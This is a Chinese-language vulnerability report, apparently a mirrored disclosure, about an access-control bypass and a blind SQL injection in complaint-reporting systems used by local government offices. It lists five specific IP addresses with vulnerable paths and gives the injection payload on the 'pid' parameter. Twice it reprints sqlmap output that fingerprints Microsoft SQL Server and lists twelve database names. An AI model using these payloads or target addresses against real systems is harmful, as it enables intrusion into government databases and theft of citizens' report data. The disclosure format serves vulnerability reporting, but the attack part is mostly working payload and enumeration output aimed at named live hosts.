|某政府系统一处越权+一处SQL注入 - VULHUB开源网络安全威胁库

某政府系统一处越权+一处SQL注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： RT ### 详细说明：山东农友软件公司官网:http://www.nongyou.com.cn/ 越权案例如下： http://221.2.149.47:8100/jubao/left.aspx http://222.135.109.70:8100/jubao/left.aspx http://123.134.189.60:8012/jubao/left.aspx http://218.56.40.229:8020/jubao/left.aspx http://222.135.127.190:7000/jubao/left.aspx [<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png) 2.一处越权注入： http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid= http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid= 2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= [<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz --- [18:13:11] [INFO] testing MySQL [18:13:11] [WARNING] the back-end DBMS is not MySQL [18:13:11] [INFO] testing Oracle sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n [18:13:12] [WARNING] the back-end DBMS is not Oracle [18:13:12] [INFO] testing PostgreSQL [18:13:12] [WARNING] the back-end DBMS is not PostgreSQL [18:13:12] [INFO] testing Microsoft SQL Server [18:13:12] [WARNING] reflective value(s) found and filtering out [18:13:12] [INFO] confirming Microsoft SQL Server [18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [18:13:13] [INFO] fetching database names [18:13:13] [INFO] fetching number of databases [18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [18:13:13] [INFO] retrieved: 12 [18:13:14] [INFO] retrieved: gangchengnl [18:13:22] [INFO] retrieved: gaoxinqunl [18:13:31] [INFO] retrieved: kaifaqunl [18:13:41] [INFO] retrieved: laichengnl [18:13:51] [INFO] retrieved: laiwunl [18:13:58] [INFO] retrieved: master [18:14:03] [INFO] retrieved: model [18:14:08] [INFO] retrieved: msdb [18:14:11] [INFO] retrieved: ReportServer [18:14:21] [INFO] retrieved: ReportServerTempDB [18:14:36] [INFO] retrieved: tempdb [18:14:41] [INFO] retrieved: xueyenl available databases [12]: [*] gangchengnl [*] gaoxinqunl [*] kaifaqunl [*] laichengnl [*] laiwunl [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] xueyenl [18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator\.sqlmap\output\123.134.189.60' ``` 均可复现。 ### 漏洞证明： 2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= [<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz --- [18:13:11] [INFO] testing MySQL [18:13:11] [WARNING] the back-end DBMS is not MySQL [18:13:11] [INFO] testing Oracle sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n [18:13:12] [WARNING] the back-end DBMS is not Oracle [18:13:12] [INFO] testing PostgreSQL [18:13:12] [WARNING] the back-end DBMS is not PostgreSQL [18:13:12] [INFO] testing Microsoft SQL Server [18:13:12] [WARNING] reflective value(s) found and filtering out [18:13:12] [INFO] confirming Microsoft SQL Server [18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [18:13:13] [INFO] fetching database names [18:13:13] [INFO] fetching number of databases [18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [18:13:13] [INFO] retrieved: 12 [18:13:14] [INFO] retrieved: gangchengnl [18:13:22] [INFO] retrieved: gaoxinqunl [18:13:31] [INFO] retrieved: kaifaqunl [18:13:41] [INFO] retrieved: laichengnl [18:13:51] [INFO] retrieved: laiwunl [18:13:58] [INFO] retrieved: master [18:14:03] [INFO] retrieved: model [18:14:08] [INFO] retrieved: msdb [18:14:11] [INFO] retrieved: ReportServer [18:14:21] [INFO] retrieved: ReportServerTempDB [18:14:36] [INFO] retrieved: tempdb [18:14:41] [INFO] retrieved: xueyenl available databases [12]: [*] gangchengnl [*] gaoxinqunl [*] kaifaqunl [*] laichengnl [*] laiwunl [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] xueyenl [18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator\.sqlmap\output\123.134.189.60' ``` [<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™